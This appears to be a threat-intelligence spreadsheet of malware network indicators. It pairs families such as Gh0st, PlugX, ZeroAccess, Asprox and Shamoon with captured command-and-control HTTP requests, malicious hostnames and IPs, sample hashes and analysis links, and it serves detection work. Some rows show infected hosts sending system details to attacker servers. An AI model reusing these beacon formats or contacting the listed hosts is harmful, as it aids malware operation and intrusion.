Bitcoinminer POST / "/
Authorization: Basic cXdlcnR5MTIzLjE6eA==
Host: www2.x3x4.su:666
Accept-Encoding: deflate, gzip
Content-Type: application/json
Content-Length: 45
User-Agent: cpuminer 2.2.3
X-Mining-Extensions: midstate

{""method"": ""getwork"", ""params"": [], ""id"":0}
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 12 May 2013 22:56:11 GMT
Content-Type: application/json
Content-Length: 635
Connection: keep-alive

{""result"": {""data"": ""000000017343cad1ae316260d1f2c262cc391443453a09fd8c8630e3bce86c47b3e476b73eaf9a0cf5eb36e74577ff3cb29f9267f5f300f252235ba77f47a9ea7aba6dba51901e351b6dcb6a00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000"", ""hash1"": ""00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000"", ""midstate"": ""b1313289534677d23f93a6447a02047a09c369962cd1029393f5a2063368dcf2"", ""algorithm"": ""scrypt:1024,1,1"", ""target"": ""ffffffffffffffffffffffffffffffffffffffffffffffffffffffff07000000""}, ""id"": 0, ""error"": null}" User-Agent: cpuminer 2.2.3 666 12E717293715939C5196E604591A97DF
Karagany Loader GET /user/go.php?html=do /go.php?html=do "User-Agent: User-Agent: Opera/10.60 Presto/2.2.30
Host: mildpass.co.cc" User-Agent: Opera/10.60 Presto/2.2.30 E6CBCEDD4D7150357312323B6F8EFA3F http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKaragany.I#techdetails_link
Gh0st Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 Gh0st Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 122B34A05530316E919604EF52EB9F1A http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html
IXESHE GET "/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA" /AWS96.jsp? "/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: freedream.strangled.net:443
Connection: Keep-Alive" User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 443 0F88D9B0D237B5FCDC0F985A548254F2
KoreanBanker DL GET /web/down/kbs.exe /down/kbs.exe "Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.colorephone.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) "E50A715D3A16CBD57339DD4C8D4605C8
8C1B83D95394BB52921DF6A218ECCA61" "http://labs.alienvault.com/labs/index.php/2013/a-theory-on-the-south-korean-attacks/
http://www.theregister.co.uk/2013/03/20/south_korea_cyberattack/"
Plugx SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO46Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO46Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png 443 "RTF 42fba80f105aa53dfbf50aeba2d73cae >>
BIN 3C74A85C2CF883BD9D4B9F8B9746030F" "http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/ 
http://espionageware.blogspot.com/2013/05/tracing-apt163qq.html
http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/"
PowerLoader POST /postnuke/blog.php /blog.php "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: real-newslife.com
Content-Length: 84
Cache-Control: no-cache

.............y..W..
,.1xV.....>.V>59..5K.xdH.h@<............./..._.4W.%.i.Oh.M....4." Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) "PowerLoaderv1 CE8B6E20E0EE177174FCA864C7451731
PowerLoaderv1 D4D96F60F6723B8EC5F1677D4657BE83
PowerLoaderv2 7DE3350CAFBE8FE843AEA9E8564E6AF5
4497A231DA9BD0EEA327DDEC4B31DA12 - May 2013" http://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
RssFeeder (moved from TBD tab, common name still unknown) 2nd stage POST /orange/news.php /news.php "Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: killme.98.shoptupian.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache

cstype=server&authname=servername&authpass=serverpass&hostname=DELLXT&ostype=Microsoft Windows XP Professional3&macaddr=00:0C:29:71:24:89&owner=two13&version=1.2.0&t=4841HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jan 2013 05:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/css
<div id=""0a552b5a4352"">{'command':[]}</div>" 68EE5FDA371E4AC48DAD7FCB2C94BAC7
RssFeeder (moved from TBD tab, common name still unknown) initialGET POST /data/rss /rss "/data/rss
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept-Encoding: gzip, deflate
Host: huming386.livejournal.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:49:06 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Content-Length: 592
Accept-Ranges: bytes
X-Varnish: 1502242906 1495326149
Age: 33018
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish" 68EE5FDA371E4AC48DAD7FCB2C94BAC7
Swami GET /im/linux.php /linux.php "Host: www.maintechy.com
Content-Length: 2281
Cache-Control: no-cache" 972c692625bd57f0c7264c9e048752f6 33A5B48073AE9A11EC2F26318D0C4721 http://byt0r.blogspot.com/2012/06/quick-notes-wpct-action-plan-from.html
GameThief GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 /get.asp?mac= "User-Agent: Google page
Host: 198.105.210.180
Cache-Control: no-cache" Google page "ECBA0FEB36F9EF975EE96D1694C8164C
4e4ea8acc683bdd054e032f8a2895c74" http://www.threatexpert.com/report.aspx?md5=ecba0feb36f9ef975ee96d1694c8164c
Beebone downloader GET "/0/?f|-1813912965Admin
/a/76876332/1" "{random}.{domain}:{port}/{number}/{affiliate_id}|{hdserial}{username}
/0/?f|-1813912965Admin
/1/?b|-2020396961winxp
/2/?f|-1396129654Guest
/9/?a|-1312965453MyPC
/0/?f|-2713912961Developer
/0/?b|-5711296542Windows7
/1/?a|-1296545361Administrator
/0/?f|-1813912965Admin
a/76876332/1
/a/76876332/bb1" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) "Random
41001
30980
8080
443" http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fBeebone#techdetails_link
Neutrino EK var POST /cxiqocvbqd "x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://thejegos.info/lkijppm?fqogndmmqm=7737359
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: thejegos.info
Content-Length: 769
Connection: Keep-Alive
Cache-Control: no-cache 

pcnfjrcxxpu=gbdl nep&ivexxbpclutvfxs=%251C%2540%250C%2505%2SOAGJEwU%2558XR1%2502%2500%2505%250E%250Fw
%2513%2504Z%255D%255D%250AU%2540%255E%2506%2501%2509L1R%2517%250E%2511%250B%2507%250B%2503EX%2S1FN%
250F%2501%251F%2505%2507%2538%251E%250B%2504%2514%2502%251OFVLT%2S4OKRH%2SSCBURK%2540%250E%250D%
2518%2504R%255D%250C%2511%2500%25021R%2501%250E%2505%251F%2506GJ%2509%2517%2508%2SOOBG%2501%2512%
2508%2507%25071%2511%2519%250A%2507FV%2500%2510%251C%2SOBNF%251E%2508%2504%251C8%2512%2508%250D%
2508%2SOEHN%251D%250C%251C%2511%2507%25163%2502%250C%2517%250F%2516FV%2500%2510%251C%2SOBNF%251A%
2502%2506R%255D%250C%2511%2500%25021R%2510%250F%2514NT%250B%2505%250B%250E%2519%2S11" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html
Comfoo / Vinself / Mspub POST /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/12AzAONjkCYw/UD1aND43a0xiWQ161/ "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)
Host: mail.lthreebox.com
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) 69bb7612b2e6a0f647b3e9c93b0bf572 DA52D94C1F5D46F5C1F73D60DA04C53C http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf
Destory Rat / Sogu / Thoper POST /update?id=000f72b8 /update?id= "Accept: */*
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Host: localhost
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1) 2385B332637DD37E4E5C79A1FED46171 http://www.threatexpert.com/report.aspx?md5=2385b332637dd37e4e5c79a1fed46171
Disttrack / Shamoon GET /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203 /data.asp?mydata= "/ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
User-Agent: you" you "D214C717A357FE3A455610B197C390AA
B14299FD4D1CBFB4CC7486D978398214" http://vrt-blog.snort.org/2012/08/new-threat-disttrack.html
Avatar Rootkit GET /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance &sort=relevance "/search?query=EZTFDHWP&sort=relevance
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: groups.yahoo.com
" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) "Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57
Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde" http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/
9002 POST 9002..................wx....9002..................wx....9002....................... 9002 9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode. "D4ED654BCDA42576FDDFE03361608CAA
3de314089db35af9baaeefc598f09b23(doc dropper)
2568615875525003688839cb8950aeae (doc dropper)" http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
MSWab /Yayih POST /bbs/info.asp /info.asp "/bbs/info.asp
Host: 199.192.156.134:443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache

3D333531501A7770a...H...H...XPSP3-OFC2007-R|us0302|10.0.2.15|WinNT v5.1 build 2600 - Service Pack 3|HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: ......, 04 .... 12 15:09:11 GMT
Content-Length: 12
Cache-Control: no-cache" FD1BE09E499E8E380424B3835FC973A8 "http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html#more
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link"
ZeroAccess / Sirefef GET "/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25
/count.php?page=952000&style=LED_g&nbdigits=9" /stat2.php?w= "HOST: iivxhdcd.cn
User-Agent: Opera/6 (Windows NT 5.1; U; LangID=409; x86)
Connection: close ""
----------------------------------------------
2013-05
ip check
/app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
followed by counter checkin-----------
/count.php?page=952000&style=LED_g&nbdigits=9
Host: www.e-zeeinternet.com
User-Agent: Opera/10 (Windows NT 5.1; US; x86)
Connection: close


HTTP/1.1 200 OK
Date: Tue, 07 May 2013 11:02:01 GMT
Server: Apache/2.2.24
Set-Cookie: ez_counter_952000=1
Content-Length: 255
Connection: close
Content-Type: image/png

.PNG." "The user agent is either Opera 5, 6, or 7, and may include a “LangID” parameter as in:
Opera/6 (Windows NT %u.%u; U; LangID=%x; x86)" "http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/
http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf

"
ZeroAccess / Sirefef ppc fraud - redirect GET HTTP/1.1 302 Moved Temporarily "Server: nginx/0.9.3 
Date: Mon, 28 Nov 2011 02:00:11 GMT 
Connection: keep-alive 
Location: http://www4search.net/?keyword=akbar+jobs&p=0|
0|eaeab70d-72b8-4492-8666-27bbd7174489 Content-Length: 0" "http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/
http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf

"
9002 POST /2d /2d "HTTP 189/0 HTTP/1..1
HTTP 189/1
HTTP 189/2
HTTP 189/3
HTTP 189/4
HTTP 189/f
HTTP 190/10
HTTP 190/11

/2d HTTP/1. 1
Use-Agent: lynx
Host: ieee.boeing-job.com
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache
AA" lynx "
3de314089db35af9baaeefc598f09b23(doc dropper)
2568615875525003688839cb8950aeae (doc dropper)" http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
Asprox / Kuluoz gets list of C2s GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 "/4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
" Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) 8080 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Asprox / Kuluoz Checkin GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
" Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) 8080 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Asprox / Kuluoz GETs spam template GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82 "/78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82
Content-Type: application/x-www-form-urlencoded
Content-Transfer-Encoding: base64
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 50.22.136.150:8080
Connection: Keep-Alive
" Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) 8080 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Carberb POST /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm "Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: caaarrp2.ru
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 60" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) http://blog.avast.com/2013/04/08/carberp_epitaph/
FakeAV var (via Kuluoz - Asprox botnet) GET /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F "/AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 208.88.5.229:808" Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) 8080 b64b5af4262cf23f3fbc54448c6311d8 http://www.nsai.it/2013/01/23/italian-dhl-spam/ https://www.virustotal.com/en/file/c49f7dbc036ad0a86df02cbbde00cb3b3fbd651d82f6c9c5a98170644374f64f/analysis/
Favorites GET /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE /download731106?h1= "/download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1)
Host: 140.112.19.195
Connection: Keep-Alive" Mozilla/5.0 (compatible; Windows NT 5.1) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites GET /search?qu= /search?qu= "User-Agent: Firefox/2.0.0.2
Host: www.google.com
Content-Length: 4
Connection: Keep-Alive" 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE /search59861?h1= "/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE
Accept: /
User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;)
Host: 140.112.19.195
Connection: Keep-Alive" Mozilla/5.0 (compatible;BKANAHEAFPEM;) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE /search613522?h1= "
/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2)
Host: 140.112.19.195
Connection: Keep-Alive" Mozilla/5.0 (compatible; Windows NT 5.2) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH /search25548?h1= "/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1)
Host: 140.112.19.195
Content-Length: 127
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/5.0 (compatible;Windows NT 5.1) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE /upload8806?h1= "/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE
Accept: /
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2)
Host: 140.112.19.195
Content-Length: 41
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/5.0 (compatible;Windows NT 5.2) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Gh0st GET /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel] /cgi/online.asp?hostname= "/cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Win32) "04e237ad7f600bfc942f326f903dc9d8 
6a5dde931418e0549163fdb024e4f2ed 
265b38204738c9c0adc612142f861022" http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/
Gh0st var GET /h.gif?pid =113&v=130586214568 HTTP/ 1. 1 /h.gif?pid =113 "/h. gif ?pid =113&v=130586214568 HTTP/ 1. 1
Accept: /
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep- Alive

HTTP/1.0 200 0K
Content-type: text/html.
Content- l..ength:0
PCRatb . . . X. . . x . . . q. s. 2406. . . . S. . P. . c. 1. 4R. u. . .1—I . . . .1.1I
..al..bf.....ga..QUS.Z\..._\ s..PCRat x
" Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1) http://labs.alienvault.com/labs/index.php/2012/new-macontrol-variant-targeting-uyghur-users-the-windows-version-using-gh0st-rat/
Guntior - CN bootkit GET /yx/tongji.html /tongji.html "/yx/tongji.html
Accept: /..
Accept-Language: en-u
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: localhost:690
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; . NET CLR 2.0.50727) 15e692cf34a70fb364591622bff1e43a http://www.threatexpert.com/report.aspx?md5=15e692cf34a70fb364591622bff1e43a
Kuluoz.B downloader GET /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 /index.php?r=gate& <site>/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKuluoz.B&ThreatID=173812#techdetails_link
Ranbyus / Triton (Spy, Banking, smart cards) POST /releases/index.php /index.php "/releases/index.php
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache

--7DD02020A0D0000
Content-Disposition: form-data; name=""q""
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000" gsa-crawler F2744552D24F7EA31E64228EB3022830 "http://inresearching.blogspot.ru/2013/02/trojanwin32spyranbyus.html
http://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/
http://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/
http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2462"
Urausy (Ransomware) GET /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php _.php "/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Host: giwje.org
Cache-Control: no-cache" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 "99f31640347259d3d2b18105e493989e 
b5cdc60ec5dfee61a9567e69ea7b59df
2814562a614f6d3fe9b22d2329b016dc 06/09/12
58c5971869a315f12f319232d1f84f87 15/09/12
54a3874120c84aa0d1e9ddcd8e60052f 22/09/12
b98af65946f3025709e7283370c67d9d 31/01/13" https://www.botnets.fr/index.php/Urausy
Glasses GET /ewpindex.htm /ewpindex.htm "User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache" https://citizenlab.org/2013/02/apt1s-glasses-watching-a-human-rights-organization/
IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT POST /index000000001.asp /index000000001.asp "Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Host: update.microsoft.com
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 000041" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) d7c826ac94522416a0aecf5b7a5d2afe https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf
LURK GET "LURK0........x.kf.e.apgpbpa0c..#........
" "LURK0........x.kf.e.apgpbpa0c..#........
L.>...!`1..f.rF.......$..#....
...........fHe(b(c.dH.........l ..:..r..""...!..P
....v...V`z0d0`0.../.T.....g.)LURK0........x.c......" "https://citizenlab.org/wp-content/uploads/2012/07/10-2012-recentobservationsintibet.pdf
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html"
DNSWatch / Protux GET /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve /dnslookup?la= "2011-05
/dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache

2012-11
/dns/dnslookup?la=en&host=vcvcvcvc.dyndns.org&type=A&submit=Resolve
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)" Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) "06ddf39bc4b5c7a8950f1e8d11c44446 
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8

" "http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359"
DNSWatch / Protux GET /news.jpg /news.jpg "/news.jpg
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: checkerror.ucparlnet.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) "06ddf39bc4b5c7a8950f1e8d11c44446 
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8" "http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359"
DNSWatch / Protux POST /PHqgHumeay5705.mp3 /PHqgHumeay5705.mp3 "2011-05
http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3
